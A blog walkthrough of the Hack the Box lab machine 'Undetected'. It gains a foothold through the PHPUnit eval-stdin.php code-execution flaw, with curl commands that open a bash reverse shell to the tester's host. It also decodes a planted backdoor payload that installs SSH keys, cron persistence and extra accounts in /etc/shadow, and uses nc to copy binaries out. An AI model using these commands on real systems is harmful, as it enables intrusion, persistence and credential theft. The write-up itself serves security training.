• Donald Ashdown

Hack the Box - Undetected


Engagement flow


Enumeration

We start off with a basic namp scan and learn about 2 ports. So this is clearly a narrow attack surface,


Web Enumeration

We start off by browsing to the website.


Clicking visit store brings us to

http://store.djewelry.htb/

Looking under the login tab we found a notice that discloses sensitive information.


Directory busting revealed a /vendor/ directory



Taking a look at the vendor directory.


Initial foothold
  1. Look up CVE for all php modules

  2. Determine phpsec is vulnerable

  3. research and exploit for command injection

  4. Create a reverse shell


Looking for CVE's for PHPunit was the most attractive as we had an easy one right off the bat.



Looking around I found this payload here


https://gist.github.com/yassineaboukir/1501de6f60dce148824d3001e83fb263



curl --data "<?php echo(id());" http:///store.djewelry.htb/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php


From here I added a command to the end and it worked!


curl --data "<?php echo(id());" http:///store.djewelry.htb/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php ; echo id


From here we can execute a reverse shell with the following;


curl --data "<?php system(\"bash -c 'bash -i >& /dev/tcp/10.10.14.14/6363 0>&1'\");" http:///store.djewelry.htb/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php




USER

  1. Observe file in var backups folder "info"

  2. cat file and extract string

  3. Decode in CyberChef

  4. Crack the hash

  5. Login as user

From here we noticed that we could execute a binary in the var www folder.


www-data@production:/var/backups$ ls -la
ls -la
total 736
drwxr-xr-x  2 root     root       4096 Jul  2 06:25 .
drwxr-xr-x 13 root     root       4096 Feb  8 19:59 ..
-rw-r--r--  1 root     root      51200 Jul  2 06:25 alternatives.tar.0
-rw-r--r--  1 root     root      34011 Feb  8 19:05 apt.extended_states.0
-rw-r--r--  1 root     root        268 Jun  4  2021 dpkg.diversions.0
-rw-r--r--  1 root     root        172 Jul  4  2021 dpkg.statoverride.0
-rw-r--r--  1 root     root     615929 Feb  8 19:06 dpkg.status.0
-r-x------  1 www-data www-data  27296 May 14  2021 info
www-data@production:/var/backups$ 


Using cat on the file and just checking the tail portion revealed a hexadecimal string. Taking this we can input the string into CyberChef.


ffff/bin/bash-c776765742074656d7066696c65732e78797a2f617574686f72697a65645f6b657973202d4f202f726f6f742f2e7373682f617574686f72697a65645f6b6579733b20776765742074656d7066696c65732e78797a2f2e6d61696e202d4f202f7661722f6c69622f2e6d61696e3b2063686d6f6420373535202f7661722f6c69622f2e6d61696e3b206563686f20222a2033202a202a202a20726f6f74202f7661722f6c69622f2e6d61696e22203e3e202f6574632f63726f6e7461623b2061776b202d46223a2220272437203d3d20222f62696e2f6261736822202626202433203e3d2031303030207b73797374656d28226563686f2022243122313a5c24365c247a5337796b4866464d673361596874345c2431495572685a616e5275445a6866316f49646e6f4f76586f6f6c4b6d6c77626b656742586b2e567447673738654c3757424d364f724e7447625a784b427450753855666d39684d30522f424c6441436f513054396e2f3a31383831333a303a39393939393a373a3a3a203e3e202f6574632f736861646f7722297d27202f6574632f7061737377643b2061776b202d46223a2220272437203d3d20222f62696e2f6261736822202626202433203e3d2031303030207b73797374656d28226563686f2022243122202224332220222436222022243722203e2075736572732e74787422297d27202f6574632f7061737377643b207768696c652072656164202d7220757365722067726f757020686f6d65207368656c6c205f3b20646f206563686f202224757365722231223a783a2467726f75703a2467726f75703a2c2c2c3a24686f6d653a247368656c6c22203e3e202f6574632f7061737377643b20646f6e65203c2075736572732e7478743b20726d2075736572732e7478743b[-] fork()/etc/shadow[.] checking if we got root[-] something went wrong =([+] got r00t ^_^[-] unshare(CLONE_NEWUSER)deny/proc/self/setgroups[-] write_file(/proc/self/set_groups)0 %d 1




I realized the c at the start of the string was actually a flag to the bash command. So I removed this and the Hex decoded.


wget tempfiles.xyz/authorized_keys -O /root/.ssh/authorized_keys; wget tempfiles.xyz/.main -O /var/lib/.main; chmod 755 /var/lib/.main; echo "* 3 * * * root /var/lib/.main" >> /etc/crontab; awk -F":" '$7 == "/bin/bash" && $3 >= 1000 {system("echo "$1"1:\$6\$zS7ykHfFMg3aYht4\$1IUrhZanRuDZhf1oIdnoOvXoolKmlwbkegBXk.VtGg78eL7WBM6OrNtGbZxKBtPu8Ufm9hM0R/BLdACoQ0T9n/:18813:0:99999:7::: >> /etc/shadow")}' /etc/passwd; awk -F":" '$7 == "/bin/bash" && $3 >= 1000 {system("echo "$1" "$3" "$6" "$7" > users.txt")}' /etc/passwd; while read -r user group home shell _; do echo "$user"1":x:$group:$group:,,,:$home:$shell" >> /etc/passwd; done < users.txt; rm users.txt;

From here we can see that we have a hash in the above photo. From here I will use hashid to confirm once it is properly formatted. At first I had no success until I realized there were back slashes being used to escape the $ sign passed in the bash command. Once I removed this, the hash id binary successfully identified the hash as SHA-512 Crypt. I was able to crack the hash and connect in over ssh as user steven.







Root

  1. Internal enumeration linpeas

  2. Browse to /var/mail and read internal note

  3. Identify and strings module reader for a encoded user command

  4. Download sshd binary

  5. Decompile and extract password from sshd binary

We browse to /var/mail and find this note.


Hi Steven.

We recently updated the system but are still experiencing some strange behaviour with the Apache service.
We have temporarily moved the web store and database to another server whilst investigations are underway.
If for any reason you need access to the database or web application code, get in touch with Mark and he
will generate a temporary password for you to authenticate to the temporary server.

Thanks,
sysadmin

My first instinct is to check apache2 logs but we have access to none of them. I start looking through the /etc/apache2 files and notice that in the mods-enabled we have one mod that stands out as being newly added.






We noticed the file added to /usr/sbin/ssh

We go to download the file with


We download the mod_reader.so file and find nothing.

nc -w 1 10.10.14.14 2323 < /usr/lib/apache2/modules/mod_reader.so

nc -nlvp 2323 > file.so


We move to the sshd binay now.


nc -w 1 10.10.14.14 2323 < /usr/sbin/sshd

nc -nlvp 2323 > sshd


We analyze this file with static binary analyses and learn of auth_password.

From here we open the file in Ghidra and search for auth_passwords and find a backdoor function.




We have to align this in CyberChef. The way we do this is by working from the top memory address in the backdoor payload in Ghidra. We also have to view the 0x5b and learn this is actually being represented as 0xa5. We then have to place this value on the top as it represents the array size of our payload. We then have to swap endianness with the word length of 31 as per Ghidra backdoor variable. We remove the pad incomplete words.


We add the From Hex with a space delimiter. We then learned thanks to the forums that there was an XOR function and we could see the key 96 next to the XOR function. This provided our final password :)





0xa5

0xa9f4

0xbcf0b5e3

0xb2d6f4a0fda0b3d6

0xfdb3d6e7

0xf7bbfdc8

0xa4b3a3f3

0xf0e7abd6



  backdoor._28_2_ = 0xa9f4;
  ppVar1 = ctxt->pw;
  iVar8 = ctxt->valid;
  backdoor._24_4_ = 0xbcf0b5e3;
  backdoor._16_8_ = 0xb2d6f4a0fda0b3d6;
  backdoor[30] = -0x5b;
  backdoor._0_4_ = 0xf0e7abd6;
  backdoor._4_4_ = 0xa4b3a3f3;
  backdoor._8_4_ = 0xf7bbfdc8;
  backdoor._12_4_ = 0xfdb3d6e7;


0xa5

0xa9f4

0xbcf0b5e3

0xb2d6f4a0fda0b3d6

0xfdb3d6e7

0xf7bbfdc8

0xa4b3a3f3

0xf0e7abd6


Once we have ordered the payload,




8 views0 comments